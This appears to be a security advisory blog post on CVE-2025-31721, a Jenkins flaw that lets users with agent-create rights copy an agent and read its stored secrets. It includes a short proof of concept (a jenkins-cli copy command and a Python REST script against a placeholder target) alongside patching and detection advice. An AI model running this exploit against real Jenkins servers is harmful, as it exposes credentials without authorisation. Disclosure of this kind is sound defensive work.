Jenkins, Missing Permission Check, CVE-2025-31721 (Critical)

By /

Listen to this Post

How CVE-2025-31721 Works

CVE-2025-31721 is a critical vulnerability in Jenkins (versions 2.503 and earlier, LTS 2.492.2 and earlier) that stems from a missing permission check. Attackers with Computer/Create permission but lacking Computer/Configure permission can exploit this flaw by copying an agent. This action allows unauthorized access to encrypted secrets stored in the agent’s configuration. The vulnerability bypasses intended security controls, exposing sensitive data such as credentials, API keys, and other secrets. The CVSS 4.0 score reflects its high severity due to the potential for privilege escalation and data compromise.

DailyCVE Form

Platform: Jenkins
Version: <= 2.503 / <= 2.492.2 (LTS)
Vulnerability: Missing permission check
Severity: Critical
Date: 04/29/2025

What Undercode Say:

Exploitation:

1. Prerequisite: Attacker must have `Computer/Create` permission.

2. Attack Flow:

  • Use Jenkins API or UI to clone an existing agent.
  • Retrieve secrets from the copied agent’s configuration.

3. Proof of Concept (PoC):

Exploit via Jenkins CLI (requires initial access)
java -jar jenkins-cli.jar -s http://target:8080/ copy-agent "victim-agent" "malicious-agent"

Python script to exploit via REST API
import requests
session = requests.Session()
session.auth = ('attacker-user', 'password')
response = session.post('http://target:8080/computer/doCreateItem', data={'name': 'malicious-agent', 'mode': 'copy', 'from': 'victim-agent'})

Mitigation:

1. Immediate Actions:

  • Upgrade to Jenkins 2.504+ or LTS 2.492.3+.
  • Revoke `Computer/Create` permissions for untrusted users.

2. Workarounds:

  • Use Script Security Plugin to restrict agent-related scripts.
  • Audit agent configurations for exposed secrets.

3. Detection:

Check Jenkins version
curl -s http://target:8080/api/json | jq '.jenkins.version'

Log analysis for agent copy events
grep "doCreateItem" /var/log/jenkins/jenkins.log

Additional Analytics:

  • CVSS 4.0 Vector: `CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N`
    – Impact: Confidentiality (High), Integrity (High).
  • Patch Link: Jenkins Security Advisory.

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top